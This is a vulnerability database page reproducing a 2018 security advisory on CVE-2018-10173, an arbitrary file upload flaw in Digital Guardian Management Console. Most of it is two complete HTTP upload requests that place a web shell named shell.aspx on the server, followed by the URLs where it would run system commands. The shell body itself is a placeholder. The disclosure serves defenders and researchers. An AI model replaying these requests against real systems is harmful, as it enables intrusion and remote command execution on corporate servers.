Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPawel GocylaPACKETSTORM:147244
HistoryApr 18, 2018 - 12:00 a.m.

Digital Guardian Management Console 7.1.2.0015 Shell Upload

2018-04-1800:00:00
Pawel Gocyla
packetstormsecurity.com
155

0.003 Low

EPSS

Percentile

65.6%

JSON
`Title: Digital Guardian Managment Console - Arbitrary File Upload Leading To Remote Code Execution (RCE) Vulnerability  
Author: Pawel Gocyla  
Date: 18 April 2018  
CVE: CVE-2018-10173  
  
  
Affected software:  
==================  
Digital Guardian Managment Console Version 7.1.2.0015   
  
Description:  
============  
Digital Guardian is an American data loss prevention software company which provides software both at the end-user level and in corporate networks, servers, databases, and the cloud. Digital Guardian is designed to see and stop malicious actions by users and malware on endpoints. It puts data events into context and applies a granular set of rules to protect it against threats.  
  
The company holds 20 patents for its technology.Its customers include about 300 Global 2000 companies, as well as seven of the 10 largest brands in the world. It is considered to be a leader in the global data loss prevention market.   
  
Vulnerability:  
**************  
Arbitrary File Upload occurs when an application allows for file uploading and does not properly check user's input. This way an attacker can upload any file and take advantage of it by reading application source code, defacing website or executing system commands on underling operating system.  
  
  
Arbitrary File Upload:  
======================  
  
1).  
  
Vulnerable parameter: "filename"  
  
Request to upload malicious code:   
  
POST /DigitalGuardian/Management/ServerSettingsPDFTemplates.aspx HTTP/1.1  
Accept: text/html, application/xhtml+xml, */*  
Referer: http://[host]/DigitalGuardian/Management/ServerSettingsPDFTemplates.aspx  
Accept-Language: en-GB  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
Content-Type: multipart/form-data; boundary=---------------------------7e030201090ea4  
Accept-Encoding: gzip, deflate  
Host: [host]  
Content-Length: 1247  
Pragma: no-cache  
Cookie: ASP.NET_SessionId=jksed11b5nquipeag3421vga; DGAuthToken=a24e5397-f562-4141-a9bc-14bc83a43e6e; MRUDomain=00000000-0000-0000-0000-000000000002; .DGMCASPXAUTH=4C22880F00715AE00D61761AE4EC2090041F9659BF6980DAC5D496F499E1D1F626764AD3AEE7ED380D7F3EEEC3E140B01FC069913B5189C1794BA4A28883D300A25228AE458C1D5C8F77221FDC84B86E443189B3AFA25AC0D1BA54BD39D92F3D8627ED536A5ABC1E1BAC680543A9114E8ABF173B5E4D47343FC277E6D59DF34FD9520B2F2EBC9FCC176C432435DA387D2FAC7C4432E4D319E068BFE8CC7CBA9EEF9F06C6A84CB00C695C8CA37FBB3D234BD1022750EDBAAF1AEF1A1FCAA84B57D61AD89410D1C49B5ABB9AD4700E1DBDCAA4C10AF0F9A96F52243EBEB5625FF22EF67EB5F59FA14D5E4E01F680490B8D6374E81F1E93EAD11FA68C5F39DAB49F7A6E906274457F2584B83B1ACF5294A3A761F720B9004E893AA9D2ECAF33146494CC27CBD404E37ECE4B314D99D1F7045C102093B3FB28495B41FB57AC43BCF8A5B732CC834B85041C20A2DC9A4330DCD5559BABA13EB45611F56D28DEDFA7C1EC8E6149A2E91704E35DFBAA7A0F540D0D9BB64F703CF622EEEB3FEBDBBE91E04E270126A892533BF1753BAF86B610FE38C2ADC1322CC60C8B6A8AEB9A3EFB84D6075C906BB726CC19587F1255F929ADB833A7C9E10031AEC9F745F135D7FF8DE22B648A5D02C6710F41B04004EA3D1A52D70D8D98365D7B009E285EA176D21BC90E6703D9761D661848370FDD03B4C5D0ACC75B60E2217E142807EF156A9A01  
Connection: close  
  
-----------------------------7e030201090ea4  
Content-Disposition: form-data; name="__EVENTTARGET"  
  
  
-----------------------------7e030201090ea4  
Content-Disposition: form-data; name="__EVENTARGUMENT"  
  
  
-----------------------------7e030201090ea4  
Content-Disposition: form-data; name="__VIEWSTATE"  
  
/wEPDwUKLTg1OTI3ODgyMQ9kFgRmD2QWAgIFDxUCCkNvbnRlbnREaXYIVGl0bGVEaXZkAgEPFgIeDGF1dG9jb21wbGV0ZQUDb2ZmFgICAw9kFgICDQ8PFgIeB1Zpc2libGVoZGRkiUrnvCnqq4KkB3GBwvkfB0YkaZYat00hQx6GFuUUjD4=  
-----------------------------7e030201090ea4  
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"  
  
B43AFC25  
-----------------------------7e030201090ea4  
Content-Disposition: form-data; name="inputFilePath"; filename="shell.aspx"  
Content-Type: image/x-png  
  
[asp shell code]  
-----------------------------7e030201090ea4  
Content-Disposition: form-data; name="btnImport"  
  
Import Image  
-----------------------------7e030201090ea4--  
  
  
  
URL to execute system commands:   
  
http://[host]/DigitalGuardian/resources/images/pdf/shell.aspx  
  
  
2).  
  
Vulnerable parameter: "filename"  
  
Request to upload malicious code:   
  
POST /DigitalGuardian/Policies/PromptSkin.aspx?ConfigType=2&skinId=26cbb147-3956-4c58-b11e-360fc9dbc6a2 HTTP/1.1  
Accept: text/html, application/xhtml+xml, */*  
Referer: http://[host]/DigitalGuardian/Policies/PromptSkin.aspx?ConfigType=2&skinId=26cbb147-3956-4c58-b11e-360fc9dbc6a2  
Accept-Language: en-GB  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
Content-Type: multipart/form-data; boundary=---------------------------7e0127125a1bd0  
Accept-Encoding: gzip, deflate  
Host: [host]  
Content-Length: 13275  
Pragma: no-cache  
Cookie: MRUDomain=00000000-0000-0000-0000-000000000002; ASP.NET_SessionId=ohi1m4lrljgcmkkazyst30lp; DGAuthToken=7f2fb432-4752-4c67-9201-d7d7a7026d26; .DGMCASPXAUTH=034026F59EE29438124E8DFDEB792408137961C2D3421F30801EBD551D57B0B4FF1525582742947494F8032987BC895521343BF5D5F04782F6951F23EFD6450059931E461BA6630A33C41B3E3B309421DD63E13733444A68E89C5DA67D7AFEC1FD6915168F2D21D56717D4258F4B188BE5412564C9FE4B37641C9483E30549ADFCD5867206A015BE2B0E9DD3C38C49E70B749280925E552A49C0C5BF6B1849BE5C035A96C2C2BE3174BDD7B5CB6183341E39CD6D208E66D8BD6AA9440E03DA4DC56095A7D4F6D2D71831033D2620B19C4C9CC0255DB198A4E2B555008BA0045C078BFC5C5582F9684D1B36314E8F046A17F2B9F90DEFA66E6E6077434B837A09AFB86C0A9B08ADB09DFA061C38EE8C8C88BB0FF93AEBA2939DA4333785B3E5D88CDF258CC0ED6D596A486B0EB6579A4D7D4BF669123110CA2D877E1D993D080C800A0AF6B3EFD147B7DB38C956C281EEAD6C8FD83819C05518069C30D9768398E915B98B8944BE1E56382DE63DF3C13CC0AFE5F157D353F5442F4E86541EB5D4262BFBDA180B1EDFA272A07633CA8EFDB6DDF2476802B69ADB016FAA086570B54C60E6462A73C5AC5729EB6A24DAE137E99843C4432E5ED9FCA90A54AF59A8DDCEE9855BAE5AEF95CDAA2C1ED949E798C50510A95D8719E6BE348575AC4893870828883E4AB23F434DF982B972AA4468BF39AE15BE98DBA1C9ECA00E8B94D1AD  
Connection: close  
  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="__EVENTTARGET"  
  
  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="__EVENTARGUMENT"  
  
  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="__LASTFOCUS"  
  
  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="__VIEWSTATE"  
  
/wEPDwUJNzkwOTIwNTQ3D2QWBGYPZBYCAgcPFQIKQ29udGVudERpdg5HcmlkRG9ja1N1YkRpdmQCAQ8WBB4MYXV0b2NvbXBsZXRlBQNvZmYeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGEWBAIBD2QWAgIBDw8WAh4EVGV4dAUaUHJvbXB0IFNraW4gLSBEZWZhdWx0IFNraW5kZAIDD2QWKAIHDw8WCB4GX1dpZHRoGwAAAAAAIGxAAQAAAB4FX1RleHQFDERlZmF1bHQgU2tpbh4JX1JlYWRPbmx5aB4HX0hlaWdodBxkFgRmD2QWAgIBDw8WCh4FV2lkdGgbAAAAAAAgbEABAAAAHwIFDERlZmF1bHQgU2tpbh4GSGVpZ2h0HB4ETW9kZQsqJVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuVGV4dEJveE1vZGUAHgRfIVNCAoADZGQCAg9kFgICAQ8PFgIfAgUMRGVmYXVsdCBTa2luZGQCCQ9kFgICAQ8PFgIeB1Zpc2libGVoZGQCDQ8QDxYCHgtfIURhdGFCb3VuZGcWAh4Ib25jaGFuZ2UFEmJOYXZpZ2F0aW5nPWZhbHNlOw8WAmYCARYCEAUGUGl4ZWxzBQEwZxAFEVBlcmNlbnQgb2YgU2NyZWVuBQExZxYBZmQCDw8PFgQfAgUGUGl4ZWxzHwtoZGQCEw9kFgJmDw9kFgIeBXN0eWxlBRhmbG9hdDpsZWZ0O21hcmdpbi10b3A6MDsWDgIBDw8WCh8CBQM1NTAeCU1heExlbmd0aAIEHwcbAAAAAAAATkABAAAAHhBDYXVzZXNWYWxpZGF0aW9uZx8KAoACZGQCAw8WAh4Hb25jbGljawVLYk5hdmlnYXRpbmc9ZmFsc2U7X0luY3JlbWVudFNwaW4oMSwndHh0V2lkdGhQaXhlbF9TcGluVGV4dEJveCcsMTAsMTUwLDIwMDApZAIFDxYCHxEFTGJOYXZpZ2F0aW5nPWZhbHNlO19JbmNyZW1lbnRTcGluKC0xLCd0eHRXaWR0aFBpeGVsX1NwaW5UZXh0Qm94JywxMCwxNTAsMjAwMClkAgcPDxYCHwtnZBYCAgEPDxYCHwIFCHBpeGVsKHMpZGQCCQ9kFgICAQ8QDxYCHwxnZGQWAGQCCw8PFgIfC2dkFgQCAQ8PFgIeB0Rpc3Bs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bzt3aWR0aDoyMjVweDtoZWlnaHQ6NTBweDsWAgIBDw8WAh8CBQxEZWZhdWx0IFNraW5kZAIlDw8WAh8LaGQWBAIDDxAPFgIfDGdkEBUBEERlZmF1bHQgKFRpZXIgMCkVASQwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDEUKwMBZxYBZmQCBQ8PFgQfAgUQRGVmYXVsdCAoVGllciAwKR8LaGRkAikPDxYIHghDc3NDbGFzcwUIZ3JpZFRleHQfAgWVCTxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KCTx0aXRsZT48L3RpdGxlPg0KCTxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sO2NoYXJzZXQ9VVRGLTgiIC8+DQoJPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCgkJYm9keXsNCgkJCXBhZGRpbmc6IDAgMTBweDsNCgkJCW1hcmdpbjogMDsNCgkJCW92ZXJmbG93OiBoaWRkZW47DQoJCQliYWNrZ3JvdW5kLWNvbG9yOiAjMWUzNTRCOw0KCQl9DQoJCS5tZXNzYWdlew0KCQkJdGV4dC1hbGlnbjogY2VudGVyOw0KCQkJdmVydGljYWwtYWxpZ246IG1pZGRsZTsNCgkJCWhlaWdodDogMTAwJTsNCgkJCXdpZHRoOiAxMDAlOw0KCQkJY29sb3I6ICMxZTM1NEI7DQoJCQlmb250LWZhbWlseTogVWJ1bnR1LEhlbHZldGljYSxzYW5zLXNlcmlmOw0KCQkJZm9udC1zaXplOiAxNnB4Ow0KCQkJZm9udC13ZWlnaHQ6IGJvbGQ7DQoJCX0NCgk8L3N0eWxlPg0KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCgk8IS0tDQoJCS8vIERpc2FibGUgcmlnaHQtY2xpY2sgbWVudS4NCgkJZG9jdW1lbnQub25jb250ZXh0bWVudSA9IGZ1bmN0aW9uICgpIHsNCgkJCXJldHVybiBmYWxzZTsNCgkJfTsNCgkvLy0tPg0KCTwvc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQoJPGRpdj4NCgkJPGltZyBzcmM9ImFnZW50cy1ibHVlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9IiIgLz4NCgk8L2Rpdj4NCgk8ZGl2IHN0eWxlPSJwYWRkaW5nLXRvcDoxMHB4OyI+DQoJCTxkaXYgc3R5bGU9InBhZGRpbmc6MTBweDttYXJnaW46MCAxMHB4O3RleHQtYWxpZ246Y2VudGVyO2JhY2tncm91bmQtY29sb3I6I0YxRjNGNDsiPg0KCQkJPHRhYmxlIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCIgYm9yZGVyPSIwIiBhbGlnbj0iY2VudGVyIj4NCgkJCQk8dHI+DQoJCQkJCTx0ZCBjbGFzcz0ibWVzc2FnZSI+DQoJCQkJCQk8TUVTU0FHRS8+DQoJCQkJCTwvdGQ+DQoJCQkJPC90cj4NCgkJCTwvdGFibGU+DQoJCTwvZGl2Pg0KCTwvZGl2Pg0KCTxkaXYgc3R5bGU9InBvc2l0aW9uOmFic29sdXRlO2JvdHRvbToxMHB4O3JpZ2h0OjIwcHg7Ij4NCgkJPGltZyBzcmM9ImRnLWxvZ28ucG5nIiBib3JkZXI9IjAiIGFsdD0iIiAvPg0KCTwvZGl2Pg0KPC9ib2R5Pg0KPC9odG1sPh4IUmVhZE9ubHloHwoCAmRkAjEPDxYCHwtoZGQCMw9kFgQCAw8PZBYCHxEFEmJOYXZpZ2F0aW5nPWZhbHNlO2QCBQ9kFgICAQ8PZBYCHxEFEmJOYXZpZ2F0aW5nPWZhbHNlO2QCNQ88KwALAgAPFggeCVBhZ2VDb3VudAIBHghEYXRhS2V5cxYIBSQyNkNCQjE0Ny0zOTU2LTRDNTgtQjExRS0zNjBGQzlEQkM2QTIFJDI2Q0JCMTQ3LTM5NTYtNEM1OC1CMTFFLTM2MEZDOURCQzZBMgUkMjZDQkIxNDctMzk1Ni00QzU4LUIxMUUtMzYwRkM5REJDNkEyBSQyNkNCQjE0Ny0zOTU2LTRDNTgtQjExRS0zNjBGQzlEQkM2QTIFJDI2Q0JCMTQ3LTM5NTYtNEM1OC1CMTFFLTM2MEZDOURCQzZBMgUkMjZDQkIxNDctMzk1Ni00QzU4LUIxMUUtMzYwRkM5REJDNkEyBSQyNkNCQjE0Ny0zOTU2LTRDNTgtQjExRS0zNjBGQzlEQkM2QTIFJDI2Q0JCMTQ3LTM5NTYtNEM1OC1CMTFFLTM2MEZDOURCQzZBMh4LXyFJdGVtQ291bnQCCB4VXyFEYXRhU291cmNlSXRlbUNvdW50AghkARQrAAM8KwAEAQAWAh8LZ2RkFgJmD2QWEAIBD2QWBAIBDw8WAh8CBSQ0QzM0OUYxQy01MzE2LTRCREUtQTA3MS01QjdBQ0JEQUFGNDJkZAICD2QWAgIBDw8WAh8CBQ9hZ2VudHMtYmx1ZS5wbmdkZAICD2QWBAIBDw8WAh8CBSRCODU4OTE0OS01RDQ4LTQ3NDYtOTdFNS05MTUzOTAwRkIzQzFkZAICD2QWAgIBDw8WAh8CBQtkZy1sb2dvLnBuZ2RkAgMPZBYEAgEPDxYCHwIFJDA4MzRFQTA0LThGNzItNDFDMS04RUE4LUFFOEQzMDAzQTM5QWRkAgIPZBYCAgEPDxYCHwIFCElORzIucG5nZGQCBA9kFgQCAQ8PFgIfAgUkQjQwRjQ0RDMtMUFBQi00OTM4LThBQjQtMDcyQUU2QTQ2QkY3ZGQCAg9kFgICAQ8PFgIfAgUJaW5uZXIucG5nZGQCBQ9kFgQCAQ8PFgIfAgUkMUFBRDNDMzItNzc3Ni00NTc2LUJBQzMtQkNDMjYxODQzNUNEZGQCAg9kFgICAQ8PFgIfAgUJb3V0ZXIucG5nZGQCBg9kFgQCAQ8PFgIfAgUkQTQ0QUMxOUEtNDRFQy00MzQ3LUE2MzMtNTQ1ODdGNkRCNEQxZGQCAg9kFgICAQ8PFgIfAgUQcHJvbXB0aGVhZGVyLnBuZ2RkAgcPZBYEAgEPDxYCHwIFJDQwQzNGQzBDLTI0QjYtNDA4Ni05OUEwLUEwMjBDM0E2MTYwNmRkAgIPZBYCAgEPDxYCHwIFCXRlc3QyLmpwZ2RkAggPZBYEAgEPDxYCHwIFJDAxMTQxQjg1LUM3RTktNDk5Ri1BMkU4LTcyMEI5OEUzMDhFNGRkAgIPZBYCAgEPDxYCHwIFDHZlcmRhc3lzLnBuZ2RkAjcPDxYCHwtoZGQCOQ9kFgQCAQ8PZBYCHxEFEmJOYXZpZ2F0aW5nPWZhbHNlO2QCAw8PZBYCHxEFEmJOYXZpZ2F0aW5nPWZhbHNlO2QCOw8PFgIfC2hkFgICAw8PZBYCHxEF7wJ3aW5kb3cudG9wLkhpZGVNZXNzYWdlUGFuZWwoKTtyZXR1cm4gd2luZG93LnRvcC5TaG93RGlhbG9nU3VibWl0KHdpbmRvdy5ldmVudCwnL0RpZ2l0YWxHdWFyZGlhbi9Qb3BVcHMvUHJvbXB0UHJldmlldy5hc3B4P3ByZXZpZXdUeXBlPTEmcHJvbXB0aWQ9MDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAyJnNraW5pZD0yNmNiYjE0Ny0zOTU2LTRjNTgtYjExZS0zNjBmYzlkYmM2YTImbG9jYWxlPWVuLVVTJmQ9ekI4SlVadWoyJTJieG1SYm9yaHIlMmJPajhPMUl1NiUyYjNNZlRYYmttblgwS3VEVSUzZCcsJ1ZlcmRhc3lzLEluYy4nLDMzOSw1NTAsJ3RydWUnLCcnLHdpbmRvdy5wYXJlbnQuZG9jdW1lbnQuYWN0aXZlRWxlbWVudCk7ZAI9D2QWAgIFDzwrAAsBAA8WCB8YAgEfGRYGBSQwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDIFJDAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwNQUkMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDA2BSQwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDcFJDAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwNAUkMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAzHxoCBh8bAgZkFgJmD2QWDAIBD2QWCGYPZBYCAgEPDxYEHwIFDURFRkFVTFQgQkxPQ0seD0NvbW1hbmRBcmd1bWVudAUoMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAyLDEsMWRkAgEPZBYCAgEPDxYCHwIFBUJsb2NrZGQCAg9kFgICAQ8PFgIfAgU6VXNlciBpcyBwcmVzZW50ZWQgd2l0aCBhIHByb21wdCBhbmQgdGhlIGFjdGlvbiBpcyBibG9ja2VkLmRkAgMPZBYCAgEPDxYCHwtoZGQCAg9kFghmD2QWAgIBDw8WBB8CBQ9ERUZBVUxUIEpVU1RJRlkfHAUoMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDA1LDMsMWRkAgEPZBYCAgEPDxYCHwIFDVVzZXIgRGVjaXNpb25kZAICD2QWAgIBDw8WAh8CBVVVc2VyIGlzIHByZXNlbnRlZCB3aXRoIGEgcHJvbXB0IGFuZCBjYW4gZGVjaWRlIHdoZXRoZXIgb3Igbm90IHRvIGNvbnRpbnVlIHRoZSBhY3Rpb24uZGQCAw9kFgICAQ8PFgIfC2hkZAIDD2QWCGYPZBYCAgEPDxYEHwIFEERFRkFVTFQgUEFTU1dPUkQfHAUoMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDA2LDQsMmRkAgEPZBYCAgEPDxYCHwIFCFBhc3N3b3JkZGQCAg9kFgICAQ8PFgIfAgUvVXNlciBpcyBwcmVzZW50ZWQgd2l0aCBhIHByb21wdCBmb3IgYSBwYXNzd29yZC5kZAIDD2QWAgIBDw8WAh8LaGRkAgQPZBYIZg9kFgICAQ8PFgQfAgUaREVGQVVMVCBQQVNTV09SRCBDSEFMTEVOR0UfHAUoMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDA3LDYsMWRkAgEPZBYCAgEPDxYCHwIFElBhc3N3b3JkIENoYWxsZW5nZWRkAgIPZBYCAgEPDxYCHwIFWlVzZXIgaXMgcHJvbXB0ZWQgdG8gZW50ZXIgYSBwYXNzd29yZCB0byBkZWNyeXB0IGEgZmlsZSBlbmNyeXB0ZWQgd2l0aCBwZXJzb25hbCBlbmNyeXB0aW9uLmRkAgMPZBYCAgEPDxYCHwtoZGQCBQ9kFghmD2QWAgIBDw8WBB8CBRVERUZBVUxUIFVTRVIgREVDSVNJT04fHAUoMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDA0LDMsMWRkAgEPZBYCAgEPDxYCHwIFDVVzZXIgRGVjaXNpb25kZAICD2QWAgIBDw8WAh8CBVVVc2VyIGlzIHByZXNlbnRlZCB3aXRoIGEgcHJvbXB0IGFuZCBjYW4gZGVjaWRlIHdoZXRoZXIgb3Igbm90IHRvIGNvbnRpbnVlIHRoZSBhY3Rpb24uZGQCAw9kFgICAQ8PFgIfC2hkZAIGD2QWCGYPZBYCAgEPDxYEHwIFDERFRkFVTFQgV0FSTh8cBSgwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDMsMiwxZGQCAQ9kFgICAQ8PFgIfAgUEV2FybmRkAgIPZBYCAgEPDxYCHwIFOlVzZXIgaXMgcHJlc2VudGVkIHdpdGggYSBwcm9tcHQgYW5kIHRoZSBhY3Rpb24gaXMgYWxsb3dlZC5kZAIDD2QWAgIBDw8WAh8LaGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBSREYXRhR3JpZFNraW5GaWxlczpfY3RsMjpjYlJlbW92ZUZpbGUFJERhdGFHcmlkU2tpbkZpbGVzOl9jdGwzOmNiUmVtb3ZlRmlsZQUkRGF0YUdyaWRTa2luRmlsZXM6X2N0bDQ6Y2JSZW1vdmVGaWxlBSREYXRhR3JpZFNraW5GaWxlczpfY3RsNTpjYlJlbW92ZUZpbGUFJERhdGFHcmlkU2tpbkZpbGVzOl9jdGw2OmNiUmVtb3ZlRmlsZQUkRGF0YUdyaWRTa2luRmlsZXM6X2N0bDc6Y2JSZW1vdmVGaWxlBSREYXRhR3JpZFNraW5GaWxlczpfY3RsODpjYlJlbW92ZUZpbGUFJERhdGFHcmlkU2tpbkZpbGVzOl9jdGw5OmNiUmVtb3ZlRmlsZTIPEztGSjY/B4I5SuEOaPlHs5UU8xJA0iF9kxxkB/vV  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"  
  
F29601FE  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="txtSkinName:TextBox"  
  
Default Skin  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="ddlDimensionUnits"  
  
0  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="txtWidthPixel:SpinTextBox"  
  
550  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="txtHeightPixel:SpinTextBox"  
  
280  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="txtDescription:TextBox"  
  
Default Skin  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="txtHTML"  
  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<title></title>  
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />  
<style type="text/css">  
body{  
padding: 0 10px;  
margin: 0;  
overflow: hidden;  
background-color: #1e354B;  
}  
.message{  
text-align: center;  
vertical-align: middle;  
height: 100%;  
width: 100%;  
color: #1e354B;  
font-family: Ubuntu,Helvetica,sans-serif;  
font-size: 16px;  
font-weight: bold;  
}  
</style>  
<script type="text/javascript">  
<!--  
// Disable right-click menu.  
document.oncontextmenu = function () {  
return false;  
};  
//-->  
</script>  
</head>  
<body>  
<div>  
<img src="agents-blue.png" border="0" alt="" />  
</div>  
<div style="padding-top:10px;">  
<div style="padding:10px;margin:0 10px;text-align:center;background-color:#F1F3F4;">  
<table cellspacing="0" cellpadding="0" border="0" align="center">  
<tr>  
<td class="message">  
<MESSAGE/>  
</td>  
</tr>  
</table>  
</div>  
</div>  
<div style="position:absolute;bottom:10px;right:20px;">  
<img src="dg-logo.png" border="0" alt="" />  
</div>  
</body>  
</html>  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="skinFile"; filename="shell.aspx"  
Content-Type: application/octet-stream  
  
[asp shell code]  
  
  
-----------------------------7e0127125a1bd0  
Content-Disposition: form-data; name="btnAddFile"  
  
  
-----------------------------7e0127125a1bd0--  
  
  
  
URL to execute system commands:   
  
http://[host]/DigitalGuardian/resources/images/SkinFiles/shell.aspx  
  
  
Contact:  
========  
pawellgocyla[at]gmail[dot]com  
  
  
  
  
`

Related

cvelist 1
prion 1
nvd 1
cve 1
